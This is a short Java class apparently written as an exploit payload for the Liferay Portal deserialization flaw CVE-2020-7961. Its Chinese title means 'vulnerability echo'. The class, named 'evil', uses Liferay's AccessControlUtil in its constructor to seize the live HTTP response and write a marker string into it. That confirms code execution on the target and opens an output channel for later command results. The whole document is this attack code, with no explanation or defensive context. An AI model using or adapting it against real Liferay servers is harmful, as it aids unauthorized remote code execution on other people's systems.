liferay CVE-2020-7961 漏洞回显
import com.liferay.portal.kernel.security.access.control.AccessControlUtil;
import com.liferay.portal.kernel.security.auth.AccessControlContext;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.OutputStream;
public class evil {
public evil() throws IOException, ClassNotFoundException {
AccessControlContext accessControlContext = AccessControlUtil.getAccessControlContext();
HttpServletResponse response = accessControlContext.getResponse();
OutputStream ot = response.getOutputStream();
ot.write("dddd".getBytes());
ot.flush();
ot.close();
}
}